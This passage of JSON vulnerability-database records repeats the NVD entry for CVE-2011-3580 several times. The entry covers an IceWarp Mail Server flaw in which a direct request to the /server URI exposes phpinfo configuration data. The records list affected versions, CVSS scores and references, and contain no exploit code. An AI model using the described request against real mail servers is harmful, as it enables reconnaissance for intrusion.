"version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3580"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-200"], "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T19:39:11", "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-12-09T19:39:11", "rev": 2, "value": 6.0, "vector": "NONE"}}, "extraReferences": [], "hash": "4ea01cb7fc50333af11d4a1e6bf8e267be82d07031d1e9ff893bdb0bdd5f78a5", "hashmap": [{"hash": "fd491ff95fc43c201d07e4cada6dc489", "key": "description"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ad748ca54d687532479fdfb825a5f871", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "be7a08449a34556fa4ea0840b564e7f3", "key": "cvelist"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5da245d7cfd34f4916f532f2437ed3a8", "key": "title"}, {"hash": "ac9a8cc07be6deac41aed2625ae4cc32", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "d3facac8ad40d6b5e1e035dbb0fcdceb", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "id": "CVE-2011-3580", "lastseen": "2020-12-09T19:39:11", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "http://www.osvdb.org/75722", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3580", "type": "cve", "viewCount": 3}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T19:39:11"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3580"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-200"], "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T11:39:31", "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T11:39:31", "wildExploited": false, "wildExploitedSources": []}, "score": {"modified": "2020-10-03T11:39:31", "rev": 2, "value": 6.0, "vector": "NONE"}}, "hash": "bace14f3917b8825c0c408576751558a7fff787dcc79f05875cd3484f1c59faf", "hashmap": [{"hash": "fd491ff95fc43c201d07e4cada6dc489", "key": "description"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ad748ca54d687532479fdfb825a5f871", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "be7a08449a34556fa4ea0840b564e7f3", "key": "cvelist"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5da245d7cfd34f4916f532f2437ed3a8", "key": "title"}, {"hash": "ac9a8cc07be6deac41aed2625ae4cc32", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "d3facac8ad40d6b5e1e035dbb0fcdceb", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "id": "CVE-2011-3580", "lastseen": "2020-10-03T11:39:31", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "http://www.osvdb.org/75722", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3580", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T11:39:31"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3580"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-200"], "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration 